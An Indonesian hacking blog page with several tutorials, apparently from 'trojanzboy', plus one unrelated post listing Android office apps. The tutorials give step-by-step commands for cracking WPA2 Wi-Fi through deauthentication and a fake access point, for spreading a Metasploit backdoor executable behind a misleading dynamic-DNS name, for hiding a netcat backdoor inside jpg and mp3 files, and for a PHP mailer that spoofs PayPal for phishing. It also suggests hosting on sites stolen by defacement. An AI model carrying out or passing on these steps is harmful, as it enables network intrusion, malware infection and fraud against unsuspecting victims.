Membuat access point palsu dengan wifihoney untuk mendapatkan wpa handshake

oke langsung saja yapz  .  .
buka terminal dan kita scanning wifi yang akan di bajak aktifkan airmon-ng
dengan menggunakan perintah

airmon-ng start wlan0

 ganti wlan0 dengan interface kalian

setelah mode monitor aktik saatnya scanning korban

airodump-ng mon0

target wifi dengan security wpa2 dengan essid =  trojanzboy@wifi channel = 3




setelah selesai menentukan korban

sekarang buka menu backtrack > expoitation tools > wireless exploitation tools > wlan exploitation > wifihoney

lalu masukkan perintah ./wifi_honey.sh <essid> <channel> <interface>

./wifi_honey.sh TrojanzBoy@wifi 3 wlan0

maka terciptalah wifi-wifi palsu

dan tunggu hingga korban connect ke salah satu wifi  dan memasukkan password
tunggu hingga dapat wpa handshake dari akses point yang aslinya

maka wpa handshake yang asli pun kita dapatkan

saatnya pengecrack kan hasil handshake

buka terminal baru masuk directory dengan perintah

 cd /pentest/wireless/wifi-honey

setelah itu cek hasil capture dengan perintah 

ls

setelah menentukan hasil cap sekarang buka masukkan perintah aircrack

aircrack-ng -w /root/Desktop/Trojanzboy.txt /pentest/wireless/wifi-honey/cap-01.cap

 /root/Desktop/Trojanzboy.txt adalah letak wordlist yang telah saya dibuat bisa di kreasikan se kreatif mungkin agar password terpecahkan
dan cari nomer yang ada handshake dari akses point asli

dan tunggu hasilnya

SUKSES bro . . !!!

Read More

Exploit windows dengan Syringe bypass av

disini saya akan mempraktekkan cara exploit windows dengan syringe inject
pada ip publik biar seru tidak lagi pada local area

ok

langsung saja ya download scriptya di --> https://dl.dropboxusercontent.com/s/stqllmoj3skep0t/syringe%28by%20Trojanzboy.blogspot.com%29.rar?token_hash=AAEP3DPIVH3dBc149VC27UelZCf93Vn6NLPoJtGtWEp-EA&dl=1

lalu ekstrak pada DESKTOP maka terdapat dua file
1. syringe.sh
2. syfile.tar

langsung saja buka terminal dan masuk ke desktop

jangan lupa chomod 777 ya pada file syringe.sh

setelah di chmod buka file syringe.sh dan rubah ip public kalian
ip public saya = 125.164.221.221
ip local saya = 192.168.1.36

cara lihat ip public bisa masuk http://www.whatismyip.com/

edit syringe.sh

setelah di setting saatnya beraksi

balik lagi ke terminal tadi lalu ketikkan perintah

./syringe.sh

dan tunggu hingga payload terbuka dan metasploit run automatic

nah exploit selesai saatnya memforward ip local kita
masuk ke modem router 192.168.1.1
masukkan password anda
kita setting pada router/modem di NAT

jangan lupa masukkan port 80 untuk apache
dan 4444 untuk payload listener

setelah router tersetting aktifkan apache
pada menu backtrack >> service >> httpd >> apache start


kalau sudah selesai saatnya membungkus ip public kita agar tidak telanjang biar korban tidak curiga dengan menggunakan http://freedns.afraid.org/

daftar setelah daftar langsung isi domain anda terserah buat pengecohan korban

setelah selesai save

dns punya saya narutoupdate.strangled.net

sekarang menggabungkan url dengan listener metasploit
disini saya namakan trojanzboy.exe

jadinya http://narutoupdate.strangled.net/trojanzboy.exe

dan saatnya menyebarkan link backdoor anda
tunggu hingga korban masuk dalam link anda dan mendownloadnya

dan session meterpreter pun terbuka

syringe av

Read More

Memanipulasi backdoor pada mp3,word jpg, dan ekstensi lainya

sesuai judul disini kita akan menyisipkan backdoor pada .doc.mp3.jpg dan ekstensi lainya
kita asumsikan netcat itu adalah backdoor/server kita

langsung aja ya download dulu programnya  https://dl.dropboxusercontent.com/s/ui3evmrbp0k8g7u/Backdooring%20exec.rar?token_hash=AAG9YwfV4mAZgKm5RssDM_lBiusBdsMVDpCK9u5iNAWnWw&dl=1


setelah di download buka programnya

1. browse your server --> masukkan server backdoor disini saya contohkan netcat sebagai backdoor saya
2. pada file ekstensi isi ekstensi terserah kalian yang suport executable  misalnya .jpg
3. browse file --> cari file gambar pada drive anda yamg berekstensi .jpg
4. browse icon kita bisa buat icon semenarik mungkin agar korban terkecoh caranya masuk pada web  http://www.prodraw.net/favicon/index.php dan upload gambar yang ingin dijadikan icon
lalu UPLOAD dan pilih resolusi dan generate

 dan download

5. setelah memilih icon saatnya pilih hasil output keluaran inject disini saya taruh di desktop saja dan mulai menginjectkan ke file .jpg

dan jika si testserverrcsC.jpg di buka maka netcat yang kita asumsikan sebagai backdoor pun juga ikut jalan

 dan kita test lagi dengan ekstensi .mp3

netcat kita asumsikan sama sebagai backdoor kita

dan rubah pada exstension dengan mp3 jangan lupa pada browse kita cari file mp3 kita dan simpan pada desktop

lalu mulai menginjectkan

 lalu terbentuklah file di desktop yang telah disisipkan netcat sebagai backoor kita

dan jika korban menjalankan mp3 yang telah kita sisipin backdoor maka
mp3 akan play dan si netcat juga jalan

 dan sekarang hasil output itu siap upload ke public . .

Read More

Membuat fake mail untuk penipuan , phising , SCAM dengan PHP

Fake Mailer atau dalam istilah gaulnya fake email adalah teknik memanipulasi header email agar terbentuk email palsu untuk mengelabuhi penerima email. Teknik ini adalah satu fenomena perkembangan kemajuan teknologi informasi.

Fake mailer ini juga bisa di kirim ke semua mail box penyedia layanan email seperti yahoo, gmail, hotmail dan lain sebagainya. Bahkan, anda bisa mengirimkan email atas nama teman anda serta nama samaran lainnya.

Oke langsung saja kita mulai , sebelumnya saya akan kasih tau SC nya dulu

Berikut SC nya, tapi tunggu dulu, sebelum anda menggunakan script ini anda harus mempunyai domain dan hostingan sendiri
bisa buat hosting gratisan ataupun hasil curian alias deface

download scriptnya di --> https://dl.dropboxusercontent.com/s/gt5oxlysvlxs38z/massmail.rar?token_hash=AAGv8lyYIVyTBrihilxRIvYmEHZ7u8A_h5j6LVPzPcJ9ZQ&dl=1 

screenshoot

 keunggulan dari script ini kita bisa kirim banyak ke email sekaligus

lihat

dan send to inbox

lalu dalam inbox email korban

akan tertera paypal sebagai pengirimnya

demo = http://anekatop.com/wp-content/themes/example/massmail.php

Read More

Cara Membuat MS Office di Tablet Android

Cara Membuat MS Office di Tablet Android -  Keuntungan dari tablet yang sangat mobile, memudahkan kita untuk membawanya kemana-mana.  Namun ada satu yang kurang dari fasilitas tablet ini berhubungan dengan style nya yang mobile, yaitu tidak adanya fasilitas office.


Sehingga ketika kita berada diluar atau sedang duduk-duduk, kita mendapat inspirasi, ingin rasanya kita langsung bisa menuliskannya kedalam tablet kita. Nah kali ini anda akan bisa memasukkan ms office kedalam tablet anda.

Dan tentunya semua aplikasi ini bisa anda unduh langsung dari play store atau link yang kami sediakan.

Office Suite Pro 7

Ini memungkinkan anda untuk melihat, membuat, mengedit, mencetak, dan berbagi Word, Excell, dan power point.  Atau anda ingin membaca file pdf, tentu saja bisa dengan aplikasi ini.

Dalam Aplikasi suit pro 7 ini juga ada file browser dan layanan cloud: Box, Drop Box, Google Drive, Sky Drive, dan Sugar sync.
Developer  :  MobiSystem
Ukuran       : 19 mb
Os               : Android  1.6 keatas

Download :  Play Store  - Mirror


Smart Office

Ini hampir sama dengan dengan suito pro 7, hanya kelebihannya adalah antar muka dengan sistem drag and drop

Developer : PICSEL
Ukuran      : 12 mb
Os             : Android  1.5 keatas

Download :  Play Store  -  Mirror


Kingsoft Office

Ini juga memiliki fasilitas yang sama dengan kedua diatas, hanya lebih canggih.

Developer : Kingsoft Office
Ukuran     : 13 mb
Os             : Android 2.1 keatas







Download : Playstore

Read More

Hacking hotspot password wpa2-psk

Setelah anda puas berhasil menghack WEP dengan Backtrack  kini anda akan saya bawa untuk mengetahui cara hacking WLAN / Hotspot yang berenkripsi WPA.

ok langsung ya

buka terminal pada backtrack

lalu hidupkan mode monitornya disini interface saya wlan0

airmon-ng start wlan0

 setelah aktif mode monitornya sekarang waktunya scanning wifi yang akan di bobol passwordnya

ketikkan perintah

airodump-ng mon0

terus cari wifi yang terkunci dengan enkripsi wpa2
disini saya akan menyerang wifi trojanzboy@wifi

ketikkan perintah

 airodump-ng -w wpa2 -c 1 --bssid 94:0C:6D:EE:C2:3F mon0

 ket: -w wpa2 = hasil capturing nantinya(bisa diganti namanya)
         -c 1 = channel yang digunakan broadcast hotspot
          --bssid  94:0C:6D:EE:C2:3F = mac address hotspot
          mon0= mode monitor interface


Jika dibarisan bawah terdapat station client yang terhubung dengan AP

selanjutnya yaitu saatnya kita mengirim perintah deauthentifikasi sebuah client yang terhubung caranya, buka terminal baru ketikan :

aireplay-ng --deauth 10 -a 94:0C:6D:EE:C2:3F -c 94:20:53:D5:09:65 mon0

 Ket= --deauth 10 = mode penyerangan sampai 10x
         -a = mac adress hotspot
         -c = client yang terhubung hotspot yaitu

ketika mengirim perintah deauth maka si client akan terputus dari hotspot tunggu sampai client konek lagi.Dan kamu akan mendapatkan WPA handshake

ket : hacking wpa2 tidak memerlukan banyak paket seperti hack wep.Kita hanya mencari handshake nya saja

Jika belum dapat handshake lakukan deauthentifikasi client lagi biar tidak usah mengetik ulang perintahnya anda cukup menekan tombol panah atas pada keyboard untuk mengulang perintah terakhir.

Namun sayangnya data yang kita terima (dari Capturan) masih terenkripsi, saat tutorial ini dibuat software aircrack-ng belum dapat membuka enkripsi tersebut akan tetapi hanya bisa menyamakan dan mencocokan binary-nya dengan bantuan kamus.
Tunggu sampai mendapatkan WPA handshake biarkan client mengkoneksikan lagi wifinya ke hotspot yang diserang apabia client sudah konek lagi maka kamu akan mendapatkan wpa handshake
Setelah dapat handshake saatnya kita mencocokan binary yang tercapture dengan bantuan kamus, buka Terminal ketikkan  

 aircrack-ng -w '/root/Desktop/TrojanzBoyword.txt' wpa2-01.cap

keterangan :

-w '/root/Desktop/TrojanzBoyword.txt'  = Letak wordlist/dictionary saya namakan TrojanzBoy.txt

wpa2-01.cap = hasil capture pada airodump-ng tadi

 tunggu sampai wordlist/kamus mencocokkan hasil capturing tadi apabia berhasil maka kunci/key akan terpecahkan 

Untuk memecahkan password wpa2 harus menggunakan wordlist atau kamus yang benar-benar akurat dan dibutuhkan kesabaran
apabila anda tidak punya wordlist bisa gunakan crunch atau yang lainya
cara menggunkan crunch bisa dilihat di  http://trojanzboy.blogspot.com/2012/11/membuat-wordlist-akurat-dengan-crunch.html

Read More